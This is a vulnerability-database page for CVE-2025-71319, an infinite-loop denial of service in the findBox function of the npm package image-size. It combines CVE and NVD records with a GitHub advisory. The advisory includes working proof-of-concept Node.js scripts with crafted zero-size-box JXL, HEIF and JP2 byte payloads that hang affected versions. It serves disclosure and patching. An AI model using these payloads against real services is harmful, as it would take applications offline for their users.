Vulnerability-Lookup

CVE-2025-71319 (GCVE-0-2025-71319)

Vulnerability from cvelistv5 – Published: 2026-06-09 19:57 – Updated: 2026-06-09 19:57 X_Open Source Unsupported When Assigned

Title

image-size < 1.2.1, 2.0.2 - Denial of Service via Infinite Loop in findBox Function

Summary

image-size 1.1.0 before 1.2.1 and 2.0.0 before 2.0.2 contain a denial of service vulnerability in the findBox function when processing specially crafted images with zero-sized boxes. Remote attackers can cause application hang by supplying malicious JXL, HEIF, or JP2 image files with box size zero, triggering infinite loops during image validation.

Severity

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')

Assigner

VulnCheck

References

2 references

URL	Tags
https://github.com/image-size/image-size/security…	vendor-advisory
https://www.vulncheck.com/advisories/image-size-d…	third-party-advisory

Impacted products

2 products

Vendor	Product	Version
image-size	image-size	Affected: 1.1.0 , < 1.2.1 (semver) Unaffected: 1.2.1 (semver)
image-size	image-size	Affected: 2.0.0 , < 2.0.2 (semver) Unaffected: 2.0.2 (semver)

Date Public

2025-04-02 00:00

Credits

Alessio Della Libera (@dellalibera)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageURL": "pkg:npm/image-size",
          "product": "image-size",
          "vendor": "image-size",
          "versions": [
            {
              "lessThan": "1.2.1",
              "status": "affected",
              "version": "1.1.0",
              "versionType": "semver"
            },
            {
              "status": "unaffected",
              "version": "1.2.1",
              "versionType": "semver"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "packageURL": "pkg:npm/image-size",
          "product": "image-size",
          "vendor": "image-size",
          "versions": [
            {
              "lessThan": "2.0.2",
              "status": "affected",
              "version": "2.0.0",
              "versionType": "semver"
            },
            {
              "status": "unaffected",
              "version": "2.0.2",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "Alessio Della Libera (@dellalibera)"
        }
      ],
      "datePublic": "2025-04-02T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "image-size 1.1.0 before 1.2.1 and 2.0.0 before 2.0.2 contain a denial of service vulnerability in the findBox function when processing specially crafted images with zero-sized boxes. Remote attackers can cause application hang by supplying malicious JXL, HEIF, or JP2 image files with box size zero, triggering infinite loops during image validation."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "NONE",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-835",
              "description": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-09T19:57:16.125Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "GitHub Security Advisory (GHSA-m5qc-5hw7-8vg7)",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7"
        },
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-findbox-function"
        }
      ],
      "tags": [
        "x_open-source",
        "unsupported-when-assigned"
      ],
      "title": "image-size \u003c 1.2.1, 2.0.2 - Denial of Service via Infinite Loop in findBox Function",
      "x_generator": {
        "engine": "vulncheck"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2025-71319",
    "datePublished": "2026-06-09T19:57:16.125Z",
    "dateReserved": "2026-06-08T20:44:31.209Z",
    "dateUpdated": "2026-06-09T19:57:16.125Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-71319\",\"sourceIdentifier\":\"disclosure@vulncheck.com\",\"published\":\"2026-06-09T21:17:03.153\",\"lastModified\":\"2026-06-09T21:17:03.153\",\"vulnStatus\":\"Received\",\"cveTags\":[{\"sourceIdentifier\":\"disclosure@vulncheck.com\",\"tags\":[\"unsupported-when-assigned\"]}],\"descriptions\":[{\"lang\":\"en\",\"value\":\"image-size 1.1.0 before 1.2.1 and 2.0.0 before 2.0.2 contain a denial of service vulnerability in the findBox function when processing specially crafted images with zero-sized boxes. Remote attackers can cause application hang by supplying malicious JXL, HEIF, or JP2 image files with box size zero, triggering infinite loops during image validation.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"disclosure@vulncheck.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"disclosure@vulncheck.com\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"disclosure@vulncheck.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-835\"}]}],\"references\":[{\"url\":\"https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7\",\"source\":\"disclosure@vulncheck.com\"},{\"url\":\"https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-findbox-function\",\"source\":\"disclosure@vulncheck.com\"}]}}"
  }
}

FKIE_CVE-2025-71319

Vulnerability from fkie_nvd - Published: 2026-06-09 21:17 - Updated: 2026-06-09 21:17

Severity

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	disclosure@vulncheck.com	https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7
	disclosure@vulncheck.com	https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-findbox-function

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [
    {
      "sourceIdentifier": "disclosure@vulncheck.com",
      "tags": [
        "unsupported-when-assigned"
      ]
    }
  ],
  "descriptions": [
    {
      "lang": "en",
      "value": "image-size 1.1.0 before 1.2.1 and 2.0.0 before 2.0.2 contain a denial of service vulnerability in the findBox function when processing specially crafted images with zero-sized boxes. Remote attackers can cause application hang by supplying malicious JXL, HEIF, or JP2 image files with box size zero, triggering infinite loops during image validation."
    }
  ],
  "id": "CVE-2025-71319",
  "lastModified": "2026-06-09T21:17:03.153",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "disclosure@vulncheck.com",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "disclosure@vulncheck.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-06-09T21:17:03.153",
  "references": [
    {
      "source": "disclosure@vulncheck.com",
      "url": "https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7"
    },
    {
      "source": "disclosure@vulncheck.com",
      "url": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-findbox-function"
    }
  ],
  "sourceIdentifier": "disclosure@vulncheck.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-835"
        }
      ],
      "source": "disclosure@vulncheck.com",
      "type": "Primary"
    }
  ]
}

GHSA-M5QC-5HW7-8VG7

Vulnerability from github – Published: 2025-04-02 15:04 – Updated: 2026-06-09 20:30

Summary

image-size Denial of Service via Infinite Loop during Image Processing

Details

Summary

image-size is vulnerable to a Denial of Service vulnerability when processing specially crafted images.

The issue occurs because of an infine loop in findBox when processing certain images with a box with size 0.

Details

If the first bytes of the input does not match any bytes in firstBytes, then the package tries to validate the image using other handlers:

// https://github.com/image-size/image-size/blob/v1.2.0/lib/detector.ts#L20-L31
export function detector(input: Uint8Array): imageType | undefined {
  const byte = input[0]
  if (byte in firstBytes) {
    const type = firstBytes[byte]
    if (type && typeHandlers[type].validate(input)) {
      return type
    }
  }

  const finder = (key: imageType) => typeHandlers[key].validate(input) //<--
  return keys.find(finder)
}

Some handlers that call findBox to validate or calculate the image size are jxl, heif and jp2.

JXL handler calls findBox inside validate. To reach the findBox call, the value at position 4:8 should be 'JXL '

// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jxl.ts#L51-L60
export const JXL: IImage = {
  validate: (input: Uint8Array): boolean => {
    const boxType = toUTF8String(input, 4, 8)
    if (boxType !== 'JXL ') return false      //<---

    const ftypBox = findBox(input, 'ftyp', 0) //<---
    if (!ftypBox) return false

    const brand = toUTF8String(input, ftypBox.offset + 8, ftypBox.offset + 12)
    return brand === 'jxl '
  },

findBox can lead to an infinite loop because the value of box.size is 0, thus the offset variable is not updated. Below relevant code with comments (using one of the PAYLOAD below as example):

// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L33-L37
export const readUInt32BE = (input: Uint8Array, offset = 0) =>
  input[offset] * 2 ** 24 +     // 0 +
  input[offset + 1] * 2 ** 16 + // 0 +
  input[offset + 2] * 2 ** 8 +  // 0 +
  input[offset + 3]             // 0

// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L66-L75
function readBox(input: Uint8Array, offset: number) {   // offset: 0
  if (input.length - offset < 4) return
  const boxSize = readUInt32BE(input, offset)           // 0
  if (input.length - offset < boxSize) return           // (8 - 0) < 0 => false
  return {
    name: toUTF8String(input, 4 + offset, 8 + offset),  // 'JXL '
    offset,                                             // 0
    size: boxSize,                                      // 0
  }
}

// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L77-L84
export function findBox(input: Uint8Array, boxName: string, offset: number) { // boxName: 'ftyp', offset: 0
  while (offset < input.length) {         // 0 < 8 => false
    const box = readBox(input, offset)    // { name: 'JXL ', offset: 0, size: 0 }
    if (!box) break                       // false
    if (box.name === boxName) return box  // 'JXL ' === 'ftyp' => false
    offset += box.size                    // offset += 0
  }
}

A similar issue occurs for HEIF and JP2 handlers: - https://github.com/image-size/image-size/blob/v1.2.0/lib/types/heif.ts - https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jp2.ts

PoC

Usage:

node main.js poc1|poc2

poc for image-size@2.0.1

// mkdir 2.0.1
// cd 2.0.1/
// npm i image-size@2.0.1
const {imageSizeFromFile} = require("image-size/fromFile");
const {imageSize} = require("image-size");

const fs = require('fs');

// JXL
const PAYLOAD = new Uint8Array([
  0x00, 0x00, 0x00, 0x00, // Box with size 0
  0x4A, 0x58, 0x4C, 0x20, // "JXL "
]);

// HEIF
// const PAYLOAD = new Uint8Array([
//   0x00, 0x00, 0x00, 0x00, // Box with size 0
//   0x66, 0x74, 0x79, 0x70, // "ftyp"
//   0x61, 0x76, 0x69, 0x66  // "avif"
// ]);

// JP2
// const PAYLOAD = new Uint8Array([
//   0x00, 0x00, 0x00, 0x00, // Box with size 0
//   0x6A, 0x50, 0x20, 0x20, // "jP  "
// ]);

const FILENAME = "./poc.svg"

function createPayload() {
  fs.writeFileSync(FILENAME, PAYLOAD);
}

function poc1() { 
  (async () => {
    await imageSizeFromFile(FILENAME)
    console.log('Done') // never executed
  })();
}

function poc2() {
  imageSize(PAYLOAD)
  console.log('Done') // never executed
}

const pocs = new Map();
pocs.set('poc1', poc1); // node main.js poc1
pocs.set('poc2', poc2); // node main.js poc2

async function run() {
  createPayload()
  const args = process.argv.slice(2);
  const t = args[0];
  const poc = pocs.get(t) || poc1;
  console.log(`Running poc....`)
  await poc();
}

run();

poc for image-size@1.2.0

// mkdir 1.2.0
// cd 1.2.0/
// npm i image-size@1.2.0
const sizeOf = require("image-size");
const fs = require('fs');

// JXL
const PAYLOAD = new Uint8Array([
  0x00, 0x00, 0x00, 0x00, // Box with size 0
  0x4A, 0x58, 0x4C, 0x20, // "JXL "
]);

// HEIF
// const PAYLOAD = new Uint8Array([
//   0x00, 0x00, 0x00, 0x00, // Box with size 0
//   0x66, 0x74, 0x79, 0x70, // "ftyp"
//   0x61, 0x76, 0x69, 0x66  // "avif"
// ]);

// JP2
// const PAYLOAD = new Uint8Array([
//   0x00, 0x00, 0x00, 0x00, // Box with size 0
//   0x6A, 0x50, 0x20, 0x20, // "jP  "
// ]);

const FILENAME = "./poc.svg"

function createPayload() {
  fs.writeFileSync(FILENAME, PAYLOAD);
}

function poc1() {
  sizeOf(FILENAME)
  console.log('Done') // never executed
}

function poc2() {
  sizeOf(PAYLOAD)
  console.log('Done') // never executed
}

const pocs = new Map();
pocs.set('poc1', poc1); // node main.js poc1
pocs.set('poc2', poc2); // node main.js poc2

async function run() {
  createPayload()
  const args = process.argv.slice(2);
  const t = args[0];
  const poc = pocs.get(t) || poc1;
  console.log(`Running poc....`)
  await poc();
}

run();

poc for image-size@1.1.1

// mkdir 1.1.1
// cd 1.1.1/
// npm i image-size@1.1.1
const sizeOf = require("image-size");
const fs = require('fs');

// HEIF
const PAYLOAD = new Uint8Array([
  0x00, 0x00, 0x00, 0x00, // Box with size 0
  0x66, 0x74, 0x79, 0x70, // "ftyp"
  0x61, 0x76, 0x69, 0x66  // "avif"
]);

const FILENAME = "./poc.svg"

function createPayload() {
  fs.writeFileSync(FILENAME, PAYLOAD);
}

function poc1() {
  sizeOf(FILENAME)
  console.log('Done') // never executed
}

function poc2() {
  sizeOf(PAYLOAD)
  console.log('Done') // never executed
}

const pocs = new Map();
pocs.set('poc1', poc1); // node main.js poc1
pocs.set('poc2', poc2); // node main.js poc2

async function run() {
  createPayload()
  const args = process.argv.slice(2);
  const t = args[0];
  const poc = pocs.get(t) || poc1;
  console.log(`Running poc....`)
  await poc();
}

run();

Impact

Denial of Service

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "image-size"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0"
            },
            {
              "fixed": "1.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "image-size"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-71319"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-02T15:04:58Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`image-size` is vulnerable to a Denial of Service vulnerability when processing specially crafted images.\n\nThe issue occurs because of an infine loop in `findBox` when processing certain images with a box with size `0`.\n\n\n### Details\n\nIf the first bytes of the input does not match any bytes in `firstBytes`, then the package tries to validate the image using other handlers:\n```js\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/detector.ts#L20-L31\nexport function detector(input: Uint8Array): imageType | undefined {\n  const byte = input[0]\n  if (byte in firstBytes) {\n    const type = firstBytes[byte]\n    if (type \u0026\u0026 typeHandlers[type].validate(input)) {\n      return type\n    }\n  }\n\n  const finder = (key: imageType) =\u003e typeHandlers[key].validate(input) //\u003c--\n  return keys.find(finder)\n}\n```\n\nSome handlers that call `findBox` to validate or calculate the image size are `jxl`, `heif` and `jp2`.\n\n`JXL` handler calls `findBox` inside `validate`. To reach the `findBox` call, the value at position `4:8` should be `\u0027JXL \u0027`\n```js\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jxl.ts#L51-L60\nexport const JXL: IImage = {\n  validate: (input: Uint8Array): boolean =\u003e {\n    const boxType = toUTF8String(input, 4, 8)\n    if (boxType !== \u0027JXL \u0027) return false      //\u003c---\n\n    const ftypBox = findBox(input, \u0027ftyp\u0027, 0) //\u003c---\n    if (!ftypBox) return false\n\n    const brand = toUTF8String(input, ftypBox.offset + 8, ftypBox.offset + 12)\n    return brand === \u0027jxl \u0027\n  },\n```\n\n`findBox` can lead to an infinite loop because the value of `box.size` is `0`, thus the `offset` variable is not updated. Below relevant code with comments (using one of the `PAYLOAD` below as example):\n```js\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L33-L37\nexport const readUInt32BE = (input: Uint8Array, offset = 0) =\u003e\n  input[offset] * 2 ** 24 +     // 0 +\n  input[offset + 1] * 2 ** 16 + // 0 +\n  input[offset + 2] * 2 ** 8 +  // 0 +\n  input[offset + 3]             // 0\n\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L66-L75\nfunction readBox(input: Uint8Array, offset: number) {   // offset: 0\n  if (input.length - offset \u003c 4) return\n  const boxSize = readUInt32BE(input, offset)           // 0\n  if (input.length - offset \u003c boxSize) return           // (8 - 0) \u003c 0 =\u003e false\n  return {\n    name: toUTF8String(input, 4 + offset, 8 + offset),  // \u0027JXL \u0027\n    offset,                                             // 0\n    size: boxSize,                                      // 0\n  }\n}\n\n// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L77-L84\nexport function findBox(input: Uint8Array, boxName: string, offset: number) { // boxName: \u0027ftyp\u0027, offset: 0\n  while (offset \u003c input.length) {         // 0 \u003c 8 =\u003e false\n    const box = readBox(input, offset)    // { name: \u0027JXL \u0027, offset: 0, size: 0 }\n    if (!box) break                       // false\n    if (box.name === boxName) return box  // \u0027JXL \u0027 === \u0027ftyp\u0027 =\u003e false\n    offset += box.size                    // offset += 0\n  }\n}\n\n```\n\nA similar issue occurs for `HEIF` and `JP2` handlers:\n- https://github.com/image-size/image-size/blob/v1.2.0/lib/types/heif.ts\n- https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jp2.ts\n\n\n### PoC\n\nUsage:\n```bash\nnode main.js poc1|poc2\n```\n\n- poc for `image-size@2.0.1`\n```js\n// mkdir 2.0.1\n// cd 2.0.1/\n// npm i image-size@2.0.1\nconst {imageSizeFromFile} = require(\"image-size/fromFile\");\nconst {imageSize} = require(\"image-size\");\n\nconst fs = require(\u0027fs\u0027);\n\n// JXL\nconst PAYLOAD = new Uint8Array([\n  0x00, 0x00, 0x00, 0x00, // Box with size 0\n  0x4A, 0x58, 0x4C, 0x20, // \"JXL \"\n]);\n\n// HEIF\n// const PAYLOAD = new Uint8Array([\n//   0x00, 0x00, 0x00, 0x00, // Box with size 0\n//   0x66, 0x74, 0x79, 0x70, // \"ftyp\"\n//   0x61, 0x76, 0x69, 0x66  // \"avif\"\n// ]);\n\n// JP2\n// const PAYLOAD = new Uint8Array([\n//   0x00, 0x00, 0x00, 0x00, // Box with size 0\n//   0x6A, 0x50, 0x20, 0x20, // \"jP  \"\n// ]);\n\nconst FILENAME = \"./poc.svg\"\n\nfunction createPayload() {\n  fs.writeFileSync(FILENAME, PAYLOAD);\n}\n\nfunction poc1() { \n  (async () =\u003e {\n    await imageSizeFromFile(FILENAME)\n    console.log(\u0027Done\u0027) // never executed\n  })();\n}\n\nfunction poc2() {\n  imageSize(PAYLOAD)\n  console.log(\u0027Done\u0027) // never executed\n}\n\nconst pocs = new Map();\npocs.set(\u0027poc1\u0027, poc1); // node main.js poc1\npocs.set(\u0027poc2\u0027, poc2); // node main.js poc2\n\nasync function run() {\n  createPayload()\n  const args = process.argv.slice(2);\n  const t = args[0];\n  const poc = pocs.get(t) || poc1;\n  console.log(`Running poc....`)\n  await poc();\n}\n\nrun();\n```\n\n- poc for `image-size@1.2.0`\n```js\n// mkdir 1.2.0\n// cd 1.2.0/\n// npm i image-size@1.2.0\nconst sizeOf = require(\"image-size\");\nconst fs = require(\u0027fs\u0027);\n\n// JXL\nconst PAYLOAD = new Uint8Array([\n  0x00, 0x00, 0x00, 0x00, // Box with size 0\n  0x4A, 0x58, 0x4C, 0x20, // \"JXL \"\n]);\n\n// HEIF\n// const PAYLOAD = new Uint8Array([\n//   0x00, 0x00, 0x00, 0x00, // Box with size 0\n//   0x66, 0x74, 0x79, 0x70, // \"ftyp\"\n//   0x61, 0x76, 0x69, 0x66  // \"avif\"\n// ]);\n\n// JP2\n// const PAYLOAD = new Uint8Array([\n//   0x00, 0x00, 0x00, 0x00, // Box with size 0\n//   0x6A, 0x50, 0x20, 0x20, // \"jP  \"\n// ]);\n\nconst FILENAME = \"./poc.svg\"\n\nfunction createPayload() {\n  fs.writeFileSync(FILENAME, PAYLOAD);\n}\n\nfunction poc1() {\n  sizeOf(FILENAME)\n  console.log(\u0027Done\u0027) // never executed\n}\n\nfunction poc2() {\n  sizeOf(PAYLOAD)\n  console.log(\u0027Done\u0027) // never executed\n}\n\nconst pocs = new Map();\npocs.set(\u0027poc1\u0027, poc1); // node main.js poc1\npocs.set(\u0027poc2\u0027, poc2); // node main.js poc2\n\nasync function run() {\n  createPayload()\n  const args = process.argv.slice(2);\n  const t = args[0];\n  const poc = pocs.get(t) || poc1;\n  console.log(`Running poc....`)\n  await poc();\n}\n\nrun();\n```\n\n- poc for `image-size@1.1.1`\n```js\n// mkdir 1.1.1\n// cd 1.1.1/\n// npm i image-size@1.1.1\nconst sizeOf = require(\"image-size\");\nconst fs = require(\u0027fs\u0027);\n\n// HEIF\nconst PAYLOAD = new Uint8Array([\n  0x00, 0x00, 0x00, 0x00, // Box with size 0\n  0x66, 0x74, 0x79, 0x70, // \"ftyp\"\n  0x61, 0x76, 0x69, 0x66  // \"avif\"\n]);\n\nconst FILENAME = \"./poc.svg\"\n\nfunction createPayload() {\n  fs.writeFileSync(FILENAME, PAYLOAD);\n}\n\nfunction poc1() {\n  sizeOf(FILENAME)\n  console.log(\u0027Done\u0027) // never executed\n}\n\nfunction poc2() {\n  sizeOf(PAYLOAD)\n  console.log(\u0027Done\u0027) // never executed\n}\n\nconst pocs = new Map();\npocs.set(\u0027poc1\u0027, poc1); // node main.js poc1\npocs.set(\u0027poc2\u0027, poc2); // node main.js poc2\n\nasync function run() {\n  createPayload()\n  const args = process.argv.slice(2);\n  const t = args[0];\n  const poc = pocs.get(t) || poc1;\n  console.log(`Running poc....`)\n  await poc();\n}\n\nrun();\n```\n\n\n### Impact\n\nDenial of Service",
  "id": "GHSA-m5qc-5hw7-8vg7",
  "modified": "2026-06-09T20:30:49Z",
  "published": "2025-04-02T15:04:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/image-size/image-size/commit/8994131c7c3ee8da1699e04700c95e0e683a0c68"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/image-size/image-size"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "image-size Denial of Service via Infinite Loop during Image Processing"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
